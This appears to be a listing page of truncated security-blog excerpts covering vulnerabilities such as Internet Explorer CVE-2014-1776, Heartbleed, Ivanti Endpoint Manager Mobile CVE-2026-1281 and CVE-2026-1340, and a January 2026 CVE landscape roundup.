blogs_unit42·2014-05-02·CVSS 8.8
CVE-2014-1776 [HIGH] A Tale of 3 Vulnerabilities, CVE-2014-1776 Exploit Linked to Previous Attacks
## A Tale of 3 Vulnerabilities, CVE-2014-1776 Exploit Linked to Previous Attacks
Bo Qu
Published: May 2, 2014
High Profile Threats
Threat Research
Vulnerabilities
CVE-2014-1776
Internet Explorer
Microsoft
## Summary
The exploit code used in the recent CVE-2014-1776 attacks shares many similar characteristics with code that exploited CVE-2014-0322 and CVE-2013-3163 .
The shared techniques, variable names and code structure suggest these exploits share a common author or template.
Palo Alto Networks customers are protected by from exploitation of CVE-2014-1776 with content release 433-2194.
Late last month reports surfaced that a new Internet Explorer vulnerability (CVE-2014-1776) was being exploited in targeted attacks. The vulnerability allows an attacker to take full contr
Unit42
Palo Alto Networks Protects Customers From Critical IE Vulnerability CVE-2014-1776
blogs_unit42·2014-04-29·CVSS 9.8
CVE-2014-1776 [CRITICAL] Palo Alto Networks Protects Customers From Critical IE Vulnerability CVE-2014-1776
## Palo Alto Networks Protects Customers From Critical IE Vulnerability CVE-2014-1776
Scott Simkin
Published: April 29, 2014
High Profile Threats
Threat Research
Vulnerabilities
CVE-2014-1776
Cyvera
Internet Explorer
Microsoft
## Summary
Critical vulnerability ( CVE-2014-1776 ) identified in Internet Explorer, with active attacks observed in the wild
IE vulnerability could be used to exploit multiple versions of Internet Explorer, including those on Windows-XP based systems, which no longer receive security updates from Microsoft
Palo Alto Networks Threat Prevention customers are protected from exploitation of the vulnerability
Cyvera endpoint solution specializes in preventing the type of exploitation behavior used in this attack
On Saturday, Microsoft disclosed a critic
Unit42
8 Tips For Dealing With Heartbleed Right Now
blogs_unit42·2014-04-12·CVSS 7.5
CVE-2014-0160 [HIGH] 8 Tips For Dealing With Heartbleed Right Now
## 8 Tips For Dealing With Heartbleed Right Now
Rick Howard
Published: April 12, 2014
High Profile Threats
Vulnerabilities
CVE-2014-0160
Heartbleed
OpenSSL
This has been a fun week. We have not had a significant cyber event like this – something that affects just about everybody on the Internet -- since the Kaminsky DNS vulnerability of 2008 . Everybody I know has been scrambling to understand what it means to their organization, to their business and to their immediate family. Yes, I said family. I am sure I am not the only one who has answered a question or two from his mother-in-law about how the Internet is melting down based on what she’s been reading in the press.
There’s a lot out there already about what Heartbleed means for the Web and beyond, and I’ll point you to our o
Wiz
CVE-2026-1281 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.2
CVE-2026-1281 [HIGH] CVE-2026-1281 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-1281 :
Ivanti Endpoint Manager Mobile vulnerability analysis and mitigation
A code injection in Ivanti Endpoint Manager Mobile allowing attackers to achieve unauthenticated remote code execution.
Source : NVD
## 9.8
Score
Published January 29, 2026
Severity CRITICAL
CNA Score 9.8
High-profile Vulnerability Yes
Affected Technologies
Ivanti Endpoint Manager Mobile
Has Public Exploit Yes
Has CISA KEV Exploit Yes
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 98.7
Exploitation Probability (EPSS) 71.8
Affected packages and libraries
cpe:2.3:a:ivanti:endpoint_manager_mobile
Sources
Linux Severity CRITICAL Has Fix Added at: Jan 30, 2026
Linux Severity CRITICAL Has Fix Added at: Feb 02, 2026
## Get a CVE risk assessm
Wiz
CVE-2026-1340 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.2
CVE-2026-1340 [HIGH] CVE-2026-1340 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-1340 :
Ivanti Endpoint Manager Mobile vulnerability analysis and mitigation
A code injection in Ivanti Endpoint Manager Mobile allowing attackers to achieve unauthenticated remote code execution.
Source : NVD
## 9.8
Score
Published January 29, 2026
Severity CRITICAL
CNA Score 9.8
High-profile Vulnerability Yes
Affected Technologies
Ivanti Endpoint Manager Mobile
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 98.6
Exploitation Probability (EPSS) 67.7
Affected packages and libraries
cpe:2.3:a:ivanti:endpoint_manager_mobile
Sources
Linux Severity CRITICAL Has Fix Added at: Feb 17, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you
Recorded Future
January 2026 CVE Landscape: 23 Critical Vulnerabilities Mark 5% Increase, APT28 Exploits Microsoft Office Zero-Day
blogs_recorded_future·CVSS 4.9
[MEDIUM] January 2026 CVE Landscape: 23 Critical Vulnerabilities Mark 5% Increase, APT28 Exploits Microsoft Office Zero-Day
# January 2026 CVE Landscape: 23 Critical Vulnerabilities Mark 5% Increase, APT28 Exploits Microsoft Office Zero-Day
January 2026 saw a modest 5% increase in high-impact vulnerabilities, with Recorded Future's Insikt Group® identifying 23 vulnerabilities requiring immediate remediation, up from 22 in December 2025. Noteworthy trends last month included Russian state-sponsored exploitation of a Microsoft Office zero-day and critical authentication bypass flaws affecting enterprise infrastructure.
What security teams need to know:
- APT28's Operation Neusploit: Russian state-sponsored actors exploited CVE-2026-21509 (Microsoft Office) via weaponized RTF files, delivering MiniDoor, PixyNetLoader, and Covenant Grunt implants
- Microsoft and SmarterTools lead concerns: These vendors accounte
2026-01-29
Published
2026-04-08
Added to CISA KEV
Exploited in the wild